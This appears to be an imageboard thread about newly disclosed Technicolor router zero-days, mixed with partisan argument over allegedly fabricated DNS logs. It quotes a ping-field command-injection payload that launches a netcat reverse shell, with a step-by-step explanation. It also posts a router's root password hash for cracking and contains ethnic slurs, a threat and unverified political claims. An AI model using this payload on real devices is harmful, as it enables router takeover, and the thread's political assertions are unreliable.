HAPPENING: new 0-days released!

So.. a fuckton of small shit that'll be annoying in the short term, and maybe one or two things that stirs up a small panic in the consumers if it gets traction with the media then?

>isp cucks btfo
wants their tard of the day back

>fake DNS logs
in short term
muh-russian hacker

Yeah, I mean, he himself isn't blowing this out of proportion. Even his DNS post is a lot more restrained than I guess some of us keep in mind. Like, he leaves open the possibility of innocent explanations for the DNS manipulation, but we tend to ignore that because it's not sexy.

a. ignored altogether
b. has his words twisted by people and hyped into things he's not re

here's the link in that case, friend
Sup Forums.org/b/

Literally nothing. He found the person who leaked the logs, but offered no real proof that they were fake. You can configure BIND to log without showing port and its not unreasonable to do so.

Also the idea was that the bank and trump were communicating, not that trump was solely pinging alfa bank. Just saying that the pings were from Alfa bank to Trump makes the logs fake is disingenous

>:::::::;nc [machine_IP] [machine_port] -e /bin/sh
lol

Can you configure BIND to put the sought IP address as the nameserver address in parentheses?

>You can configure BIND to log without showing port

Prove that you can configure BIND to log in this manner:

client 217.12.97.15 query:

>Also the idea was that the bank and trump were communicating, not that trump was solely pinging alfa bank. Just saying that the pings were from Alfa bank to Trump makes the logs fake is disingenous

You don't seem to have any idea what you're talking about.

>disingenous

>>>>>>>> Sup Forums

Yeah, no, not a Trump fan, but this kind of nonsense won't stand. The logs are clearly manipulated, but what fucking Sup Forums ignores is that the author leaves open the possibility of a benign explanation for the manipulation. At worst, it could just be that she tried to present her raw data in BIND 9 format but doesn't really understand the format - which is still cause for embarrassment and possible job loss but not hell-damning.

What's his endgame?

it's open source, so yes

So your idea of "configuring BIND" is patching the source code? Lovely.

In that case, open source is irrelevant. You can patch binary code if you know what you're doing.

probably to dismantle this russia election hacking shit once and for all

It's funny, but the joke is on Technicolor, not the author. Such injection vulns for rooting a device are the Holy Grail in the rooting community because they have virtually foolproof reliability.

Been saying for years that nothing is going to change with these companies until there are legal consequences for such shitty code.

He's doing it to get people looking at the smoking gun DNS logs that help prove Trump was being set up with all this muh russia crap.

Can't ignore him now, although I'm sure the tech media will do their damndest anyways.

There was more evidence showing that the "Trump" server was also entirely fabricated.

It wasn't just the logs themselves.

that was my first post in this thread
I was just being a smartass
but yes, it'd take a few seconds

>What's this about fake DNS logs?

Okay, going off what I can remember:
>MSM: WOOOOOOW TRUMP WAS COMMUNICATION WITH RUSSIA!!!
>>A server in trump tower was communicating with a russian bank
>>>A server in trump tower exchanged some spam emails with a russian bank
>>>>A spoofed server set up by a democrat to look like it was being used by Trump was exchanging spam emails with a russian bank
>>>>>A spoofed server set up by a democrat to look like it was being used by Trump, with forged DNS logs, was exchanging spam emails with a russian server that doesn't actually exist

It got completely glossed over and ignored by the media past that initial "TRUMP RUSSIA COMMUNICATION COLLUSION TREASON IMPEACH"

I bet they'll just double down on russian hacker

Here's from the original story breaking.

Hillary posted about it the exact same minute the story broke.

And then there was this evidence that was beginning to show the entire thing was a fabrication

...

Anyways, these are just what I happened to save when it initially went down

Neat, in the UK some ISPs use Technicolor modems, wonder if it'll work with mine

Realistically, some of these vendors have a long history of telling vulnerability reporters to go and fuck themselves.

This meme about "responsible disclosure" is heavily based around supporting ensuring million dollar vendors don't look bad, and offers nothing for the community in general.

Wow, it actually did work, and they even run the ping command as root! Good shit

I'm a newbie when it comes to routers and networking; how do you connect to the router? Telnet? SSH?

I'm autistic; the article explains most of it

someone give me the TL;DR version please

With this exploit you basically need to host a reverse shell on your PC with netcat, then use the command the blog post says to exploit the "ping diagnostics" page

On that page there's a textbox for you to put in an IP address/hostname to ping, which probably just runs something like "ping -t 5 ", so if the textbox content is ":::::::;nc [machine_IP] [machine_port] -e /bin/sh" it'll also end up running that nc command after the ping command.

That nc command just connects to your reverse shell and passes all I/O to the /bin/sh executable, which basically gives you control of the whole system since all of that gets run as root.

Most well-made things would be able to detect this kind of attack easily and be able to strip the command out, it's usually just pajeet-tier code which has problems like this (and with the state of Technicolors router UI it's pretty obviously pajeet-tier)

>That nc command just connects to your reverse shell and passes all I/O to the /bin/sh executable, which basically gives you control of the whole system since all of that gets run as root.
i fucking hate indians

And "responsible disclosure" in practice amounts to "letting the government know first so it can use the shit for three months."

What model do you have?

i'm suprised no one has exploited RomPager yet, its the most used service in the world, (router modem web server)...

Tell me as I can't be bothered reading the autist blog. Is this only exploitable on a local network?

...

Underage detected.

Nice link retard

The CWMP one will exploitable across the Internet for many users, though as the post admits, it's not likely to be done so widely.

As notes, rompager is more straightforward to exploit, yet I'm not aware of it actually being targeted en masse.

the most recent major ones from wikileaks and shadowbroker were ignored by the vendors and allowed to be taken advantage of by governments
releasing them was the best way to fix them

Tnx user.

By this point posting this image should result in an autoban.
I only ever see it posted at leaks, non-pc news outlets and other content certain groups want to not get attention.
It's as if the purpose of the macro was to silence discussion and scare people.

perhaps no one bad enough has been able to grok the assembler needed.. still very worrying, I wonder how resilient the internet is to that scale of DDoS these days since the old days that kids on IRC took down amazon and ebay.

TL;DR

Would It work for non-technicolor things?

Sorry was away for a bit, it's a MediaAccess TG589vac, supplied by SSE (an ISP in the UK)
Runs v15.2 which is actually pretty old afaik, last I checked couldn't find any newer versions for this model though.

Also if anyones interested in the shadow file here it is, would be neat if someone can crack that hash:
root:$1$LxlsOy8R$vjiUURbU9Y9sDSd.fevT0.:0:0:99999:7:::
daemon:*:0:0:99999:7:::
ftp:*:0:0:99999:7:::
network:*:0:0:99999:7:::
nobody:*:0:0:99999:7:::

>Slate asks clinton campaign for comment.
>"Don't make a statement until the story breaks at xyz"
>???????
>???????
>You're retarded

FS user here.

huh... if all that is accurate.. I'm not sure what would this be considered? Identity theft, or could it be construed into some form of slander?

Is there even case law concerning presuming a person's identity and then using that presumed identity to instigate a criminal investigation against the actual person?

Why do you.. and other people think this is a crime that ought to be investigated in the first place? Even if Trump was in contact with foreign entities with the expectation that they'd help him get elected, the punishment for that is nothing more than a slap on the wrist. It's not actually a crime.

USA would need to be at war with Russia for this to become a crime.

>Why do you.. and other people think this is a crime that ought to be investigated in the first place? Even if Trump was in contact with foreign entities with the expectation that they'd help him get elected, the punishment for that is nothing more than a slap on the wrist. It's not actually a crime.

I don't consider the potential contact between trump and the Russians as a crime, I mean FFS there's recordings of Obama talking with Medvedev prior to the 2012 election promising more leeway with Russia after the fact, this is a nothing-burger by comparison. I'm actually more concerned about the alleged methods that are said to have been used to bring about a criminal investigation in the first place. I don't really consider it a crime at this point. Especially with the fact that it's been investigated to death and if there was any true connection/collusion etc there'd have been charges and an incitement by now.

I was going to say that this is literally nothing, but I figure that's just a knee-jerk reaction to the fact that Sup Forums's dumb rednecks are posting this like it's the Internet apocalypse.

This isn't the Internet apocalypse, as the person admits himself, but I can't in good faith deny that, going by the three posts as a whole, especially the fbsd one, there's something unique happening here. I don't understand his target choices, though. He certainly has the skill set for top-tier vulns, so why does he direct it at such seemingly lame bullshit? The fbsd ones, for instance, you essentially have to have God access to the Internet to exploit, so they're nothingburgers for the vast majority of people. He has to know that, so it's very strange he seems to have spent weeks on it.

P.S. But what's also very strange is that he gave fbsd developers a complete fix, they stalled forever, and then released an incomplete fix. I remember this actually. They eventually had to issue a rare mea culpa.

This idiot has been smashing on my router since Christmas. I hope he gets shot. Straight up.

P.P.S. Then there's the fact he doesn't put a name to any of it, even when praised, as he was for the fbsd work. Even the weaponizedautism theme looks like some ruse. I doubt he even cares that much for Trump, quite frankly. Some of this work requires very keen insight and an unforgivingly ruthless approach toward people's flawed thinking and assumptions. There's no way someone like that could remain a Trump fan for long, let's face it.

root

Well some wordpress blogers exposed how fake those logs where and no one cared because it was not posted on leddit and those who tried to post in on the free speech platform got downvoted to hell (sources, me)

Also yes those logs where horse shit from day one but the fun thing is not the initial logs its the castle that the media buldied around them, making articles cinting as the origin of all this drama sources that someone droped on a tor link that no longer exists. Every 2 months some idiot hypster press shill makes an article based on an article of an article of fake soruces, and people eat it out all the time.

The fake media made a rock tower that wont fall because people are to ignorant to push it down.

My retarded TG588v doesn't even have the option for ping in the webgui.

>bunch of modems used in 3rd world countries

wow who cares

>Even if Trump was in contact with foreign entities with the expectation that they'd help him get elected, the punishment for that is nothing more than a slap on the wrist. It's not actually a crime.
What? It's high treason and the punishment is the death penalty. It's a crime so severe that it hasn't happened in the history of the US.

Botnet makers

like holy shit son, this.
> minimum 10 million free Sup Forums ban bypass machines

they're roots too, you could probably take out a few datacenters with a botnet of that size, even if all of the zombies were all about dialup speed.

They're used in the UK, Australia, and many Western European countries, for starters, but are often rebranded, so people don't realize they have Technicolor gear.

The trouble is that in the ocean of abuse online, adding another bucket of water doesn't really change the dismal picture all that much. There's just way too much bad shit already happening.

Like I said... 3rd world countries.

it's basically entrapment

what is lorenzen

retard

that joke probably sounded funnier in your head

Now that I've had some coffee and time to mull on it, I'd actually go so far as to say it was falsification of evidence.

>and with the state of Technicolors router UI it's pretty obviously pajeet-tier)

Well, now i fucking know why it takes 10 fucking seconds to change between urls in those pieces of shit, and how fucking godawful it is to open a bunch of fucking ports.

0 day in a technicolour product is like a 0 day in Windows XP back in ~2005. Completely and utterly uninteresting unless you're using it or trying to hack it.

Their routes are GARBAGE. Utter garbage. They can't even function normally, the fucking thing crashes all the time.

>This is the same guy who posted a super long analysis of the fake DNS logs that the FBI used to get a FISA warrant on Trump tower. Seems like the guy really knows his shit.

No, he is making shit up to satisfy Sup Forums and r/the_donald.

i don't speak nerd, what does this mean?

Did you actually look at the analysis?

I don't care for trump but the analysis puts the fisa warrant application in questionable light, which actually makes sense that it wad denied in the first place.

>Cognitive dissonance
She lost faggot, get over it.

Treason is LITERALLY.
I repeat L I T E R A L L Y
Only possible when US is at WAR with Russia.
I repeat W A R.
Unless you somehow manage to get US and Russia into WAR, then what he did (if he even did it at all) is not TREASON. Use the word correctly, you mentally deficient fucktard.

Neither does the law. Which is the point. Treason requires a state of war.

>technicolor
that kinda sucks, i kinda like the folks working on their tech support (non-pajeets that actually know what they are doing)